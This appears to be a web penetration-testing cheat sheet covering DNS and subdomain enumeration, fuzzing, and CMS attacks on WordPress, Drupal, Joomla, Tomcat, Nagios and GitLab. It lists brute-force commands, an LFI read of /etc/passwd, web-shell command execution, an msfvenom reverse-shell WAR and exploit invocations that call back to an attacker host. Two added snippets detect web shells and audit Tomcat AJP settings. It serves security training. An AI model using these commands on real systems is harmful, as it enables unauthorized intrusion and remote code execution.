Incorrect DNS Resolution
The domain and IP need to be added to the /etc/hosts file:
sudo nano /etc/hosts
CMS Scanner
Tool - cmsmap
Command syntax:
python cmsmap.py https://<IP>
URL to download it: github-cmsmap
Tool - cmseek
python3 cmseek.py -u <domain.com>
More info in: CMSeeK
Sniffers
Wireshark
Tcpdump
https://github.com/DanMcInerney/net-creds
https://github.com/lgandx/PCredz
Test SSL Certificate
Tool - Testssl
Syntax:
./testssl.sh <domain.com>
URL to download it: Github
Vulnerability Web Scanner
Tool - Nikto
Syntax:
nikto -h http://<IP>
Tool - Nuclei
Syntax:
nuclei -u https://<IP>
More information and download: https://github.com/projectdiscovery/nuclei
Other automatic Tools
recon-ng
Nessus
OpenVAS
Tools for Testing Web Applications
Burpsuite: intruder, repeater, intercept
Owasp ZAP: HUD to view hidden fields, crawling, etc.
Tools to Discover Web Technology
Whatweb
whatweb http://<IP>
Wappalyzer
Curl and wget Commands
Curl and Wget are both command-line tools used for downloading files from the internet. They are valuable utilities for fetching files and data from web servers efficiently.
Curl
Example:
curl http://<IP>/<file.txt>
Wget
Example:
wget http://<IP>/<file.txt>
Example to do it recursively:
wget -r http://<IP>
Tool for Detecting WAF (Web Application Firewall)
wafw00f
Command example:
wafw00f https://<domain.org>
URL to github: wafw00f
Add a Proxy to route all Traffic
Burpsuite and OwaspZAP are very good tools for it.
Proxychains is a very useful tool in Linux, which routes all traffic coming from any command-line tool to any proxy we specify. Because it adds a proxy to any command-line tool, it is the simplest and easiest method to route the web traffic of command-line tools through our web proxies.
To use proxychains, we first have to edit /etc/proxychains.conf, comment out the final line and add a new line at the end of it.
Example of new line:
http 127.0.0.1 8080
Example to run a curl command with proxychains:
proxychains curl http://SERVER_IP:PORT
If we go to our web proxy (Burpsuite for example), we will see that the request has indeed gone through it.
In Metasploit, the same can be done with the RPROXIES option. Example:
set RPROXIES HTTP:127.0.0.1:8080
Enumerate DNS Information about a Domain
Tool - dnsenum
Command syntax:
dnsenum -o <output.xml> <example.com>
Tool - whois
Command syntax:
whois <IP or domain>
Tool - Nslookup
Command syntax:
nslookup [options] [domainName]
Web Content Scanner and Fuzzing
dirb is an interesting tool to find subdirectories:
dirb http://<target> <pathWordlist>
Fuzzing for Subdomains and Subdirectories
ffuf is an interesting tool to find subdirectories and subdomains.
Find subdirectories:
ffuf -w <pathWordlist>:FUZZ -u https://target/FUZZ
GET - Parameter fuzzing:
ffuf -w </path/to/values.txt> -u 'https://target/script.php?valid_name=FUZZ' -fc 401
POST - Parameter fuzzing:
ffuf -w /path/to/postdata.txt -X POST -d "username=admin&password=FUZZ" -u https://target/login.php -fc 401
Find subdomains:
ffuf -w <subdomains.txt> -u http://website.com/ -H "Host: FUZZ.website.com"
Example:
ffuf -w namelist.txt:FUZZ -u http://10.129.203.101/ -H 'Host:FUZZ.inlanefreight.local' -fs 15157
Useful dictionary: /SecLists/Discovery/DNS/subdomains-top1million-5000.txt
Find extensions:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ
To find files with the extension php:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
To find parameters:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'
Filter by size or by code to see the different ones:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
To find LFI with that parameter found:
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://165.22.118.93:30678/index.php?view=FUZZ' -fs 1935
Tip: In PHP, "POST" data "content-type" can only accept "application/x-www-form-urlencoded". So, we can set that in ffuf with -H 'Content-Type: application/x-www-form-urlencoded'.
Example:
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
Parameter -fc filters responses by HTTP status code.
Parameter -fs filters responses by response size.
More Tools - Find Subdomains
Sublist3r
https://github.com/aboul3la/Sublist3r
Certificate Transparency logs - online tool
https://crt.sh/
dnsenum
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
Zone Transfer
Zone transfer in pentesting is the process of obtaining DNS zone data from a target to gather valuable information about its domain names, subdomains, and network structure, helping to identify potential vulnerabilities and entry points.
- Identifying Nameservers
nslookup -type=NS zonetransfer.me
- Perform the zone transfer using the -type=any and -query=AXFR parameters. Testing for ANY and AXFR zone transfer:
nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja
Example Subdomain Brute Forcing
for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
Try zone transfer
Example:
dig axfr @<IP> <domain.com>
Pentest Common CMS
Drupal
Discovery
A Drupal website can be identified in several ways, including by the header or footer message "Powered by Drupal", the standard Drupal logo, the presence of a CHANGELOG.txt or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.
curl -s http://drupal.domain.local | grep Drupal
Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.
Enumeration
curl -s http://domain.local/CHANGELOG.txt | grep -m2 ""
Tool - droopescan
Droopescan is an open-source tool designed to perform vulnerability scans on Drupal-based content management systems (CMS). It aims to identify potential weaknesses and vulnerabilities in websites that use the Drupal CMS.
Command:
droopescan scan drupal -u http://example.org/ -t 32
More info: https://github.com/droope/droopescan
Tool - drupwn
Drupwn is a tool used for gathering information and performing security assessments on Drupal websites. It helps identify potential vulnerabilities and weaknesses in websites that use the Drupal content management system.
Command:
python3 drupwn --mode enum --target https://example.com
python3 drupwn --mode exploit --target https://example.com
More info: drupwn
Vulnerability - Drupalgeddon
Exploit Drupalgeddon: https://www.exploit-db.com/exploits/34992
python2.7 drupalgeddon.py -t http://domain.local -u <user> -p <password>
We could also use the exploit/multi/http/drupal_drupageddon Metasploit module to exploit this.
Exploit Drupalgeddon2: https://www.exploit-db.com/exploits/44448
Exploit Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3
In Metasploit: multi/http/drupal_drupageddon3
WordPress
Tool - wpscan
Install it:
sudo gem install wpscan
Command syntax:
wpscan --url http://<IP>/ --enumerate
Looking for users, command example:
wpscan -e u -t 500 --url http://<domain>
Plugins:
wpscan --url http(s)://<domain> --enumerate p
Vulnerable plugins:
wpscan --url http(s)://<domain> --enumerate vp
Brute force:
wpscan --url http://<domain> -P <passwords.txt> -U <users.txt>
Brute force to xmlrpc login:
The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it's faster.
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P <pathWordlist> --url http://<domain>
Interesting paths:
/wp-admin: login
/wp-content/uploads: files contained on the server.
Manual - Discovery themes
curl -s http://<domain>/ | grep themes
Manual - Discovery plugins
curl -s http://<domain>/ | grep plugins
Other way:
nmap -sV --script http-wordpress-enum <IP>
Code Execution
With administrative access to WordPress, we can modify the PHP source code to execute system commands. Click on Appearance on the side panel and select Theme Editor. This page will let us edit the PHP source code directly. An inactive theme can be selected to avoid corrupting the primary theme.
Click on Select after selecting the theme, and find a page to edit. For example, we can edit a page such as 404.php to add a web shell.
Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.
Example of RCE:
curl http://<domain>/wp-content/themes/twentynineteen/404.php?0=id
Metasploit has a module that uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell.
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
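The Theme Editor path above depends on file editing being enabled in the WordPress admin. As an added example (not from the page, nor WordPress's own code), this audits a constructed wp-config.php for the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS constants, and scans a theme file for request input flowing straight into a PHP execution call, which is the shape of the 404.php web shell described above. The config fragments and theme contents are constructed samples.

```python
import re

# Constructed wp-config.php fragment (not from a real site) with file editing left enabled.
WP_CONFIG_WEAK = """\
define('DB_NAME', 'wordpress');
define('WP_DEBUG', false);
"""
# Same fragment with the two constants that remove the Theme Editor from the admin UI.
WP_CONFIG_HARDENED = WP_CONFIG_WEAK + """\
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);
"""
# Constructed theme file contents: one resembling the 404.php edit described above, one clean.
THEME_404_TAMPERED = "<?php get_header(); system($_GET['0']); get_footer();"
THEME_404_CLEAN = "<?php get_header(); ?><h1><?php _e('Not found'); ?></h1><?php get_footer();"

DEFINE_RE = re.compile(r"define\(\s*['\"](\w+)['\"]\s*,\s*(true|false)\s*\)", re.I)
# A command-execution function whose argument list contains raw request input.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SHELL_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*[^)]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)


def wp_config_defines(text):
    """Map boolean define() constants in a wp-config.php to their values."""
    return {name.upper(): val.lower() == "true" for name, val in DEFINE_RE.findall(text)}


def missing_hardening(config_text):
    """Hardening constants not set to true; an empty list means the editor is disabled."""
    defines = wp_config_defines(config_text)
    return [c for c in ("DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS") if not defines.get(c)]


def looks_like_webshell(php_source):
    """True when request input flows straight into a command-execution call."""
    return SHELL_RE.search(php_source) is not None
```

Run the same check over every .php file under /wp-content/themes/ and /wp-content/uploads/ to catch the edited 404.php or an uploaded shell; a positive match is a reason to diff the theme against a clean copy.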
Vulnerable plugin - mail-masta
The source code has a parameter that allows including a file without any validation or input sanitization. By using this, we can include arbitrary files on the web server. Let's take advantage of this to retrieve the content of the file /etc/passwd using cURL.
curl -s http://domain.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Vulnerable plugin - wpDiscuz
The exploit script takes two parameters: -u, the URL, and -p, the path to a valid post.
Example:
python3 wp_discuz.py -u http://domain.local -p /?p=1
We can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands, as we can see in the exploit script.
curl -s http://domain.local/wp-content/uploads/2021/08/shell.php?cmd=id
Joomla
Fingerprinting
curl -s http://domain.local/ | grep Joomla
We can fingerprint the Joomla version if the README.txt file is present:
curl -s http://domain.local/README.txt | head -n 5
In certain Joomla installs, we may be able to fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml.
curl -s http://domain.local/administrator/manifests/files/joomla.xml | xmllint --format
The cache.xml file can help to give us the approximate version. It is located at plugins/system/cache/cache.xml.
Tool - droopescan
Github: https://github.com/SamJoan/droopescan
Install it:
sudo pip3 install droopescan
Command example:
droopescan scan joomla --url http://domain.local/
Tool - JoomlaScan
Github: https://github.com/drego85/JoomlaScan
Install it:
sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4
Command example:
python2.7 joomlascan.py -u http://domain.local
Tool - Joomla-bruteforce
This tool performs a brute-force attack against the login.
Github: https://github.com/ajnik/joomla-bruteforce
Example:
sudo python3 joomla-brute.py -u http://domain.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <user>
Vulnerability CVE-2019-10945
Github: https://github.com/dpgg101/CVE-2019-10945
Exploit: https://www.exploit-db.com/exploits/46710
Example:
python2.7 joomla_dir_trav.py --url "http://domain.local/administrator/" --username admin --password admin --dir /
Tomcat
Interesting paths:
/etc/tomcat9/tomcat-users.xml
/manage
/manager
/host-manager
/docs
Default credentials
tomcat:tomcat
admin:admin
Footprinting/discovery
Syntax:
curl -s http://<domain>:<port>/docs/ | grep Tomcat
Upload a Reverse shell
- Create a reverse shell as a WAR file with msfvenom. Example:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o <file.war>
- Upload the WAR file.
- When the uploaded file is executed, the connection is opened.
Another option is to do it with Metasploit (the shell should be uploaded in the path /manage).
Tomcat Manager - Login Brute Force
Metasploit module -> scanner/http/tomcat_mgr_login
Other way - exploit:
Exploit: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
Example:
python3 mgr_brute.py -U http://<domain>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
CVE-2020-1938 : Ghostcat
Command:
nmap -sV -p 8009,8080 <domain>
PoC: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
Code:
python2.7 tomcat-ajp.lfi.py <domain> -p <port> -f WEB-INF/web.xml
In some Tomcat installs, we may be able to access sensitive data within the WEB-INF directory.
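For Ghostcat the fix sits on the Tomcat side: disable the AJP connector, or bind it to loopback and require a shared secret. As an added example that is not from the page or from Tomcat itself, this audits constructed server.xml fragments for AJP connectors that listen on all interfaces or have no secret configured; the sample files and the secret value are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not from a real install). The first is the
# classic default: AJP on 8009, no secret, listening on every interface.
SERVER_XML_WEAK = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""
# The hardened form: loopback only and a mandatory shared secret (placeholder value).
SERVER_XML_HARDENED = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET"/>
  </Service>
</Server>
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")


def audit_ajp_connectors(server_xml):
    """Return one list of findings per AJP connector found in server.xml.
    An empty list means that connector is loopback-bound and secret-protected."""
    root = ET.fromstring(server_xml)
    results = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP connectors are not affected by CVE-2020-1938
        findings = []
        port = conn.get("port")
        addr = conn.get("address", "0.0.0.0")  # Tomcat binds all interfaces when unset
        if addr not in LOOPBACK:
            findings.append(f"port {port}: AJP bound to {addr}, not loopback")
        # Without a configured secret the connector accepts any AJP client
        if conn.get("secretRequired", "true").lower() != "true" or not conn.get("secret"):
            findings.append(f"port {port}: no shared secret required")
        results.append(findings)
    return results
```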
Symfony
Tool - eos
https://github.com/synacktiv/eos
Installation
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos
Example of usage:
eos scan http://domain.com --output results
Nagios
Exploit: https://www.exploit-db.com/exploits/49422
Example:
python3 nagiosxi-rce.py http://domain.local username password 10.10.14.236 5555
Pentest Applications
Git
This script downloads a Git repository that is exposed on a web server so that deleted files can be restored.
Syntax:
./gitdumper.sh http://<IP>/.git/ <pathOutput>
To view repository status and deleted files:
git status
To restore a deleted file:
git checkout <fileToDownload>
GitLab
It is a web-based Git-repository hosting tool that provides wiki capabilities, issue tracking, and continuous integration and deployment pipeline functionality. It is open-source and originally written in Ruby, but the current technology stack includes Go, Ruby on Rails, and Vue.js.
Interesting paths:
/help
/users/sign_in
/explore
Username Enumeration
Exploit: https://www.exploit-db.com/exploits/49821
Other exploit: https://github.com/dpgg101/GitLabUserEnum
Command example:
./gitlab_userenum.sh --url http://<domain>:<port>/ --userlist <users.txt>
or:
python3 gitlab_userenum.py --url http://<domain>:<port>/ --wordlist <pathWordlist>
Caution: GitLab's default is to lock an account after 10 failed attempts, with an automatic unlock after 10 minutes.
Authenticated Remote Code Execution (RCE)
Exploit RCE: https://www.exploit-db.com/exploits/49951
Example of reverse shell:
python3 gitlab_13_10_2_rce.py -t http://<domain>:<port> -u <user> -p <password> -c '<reverseShellCode>'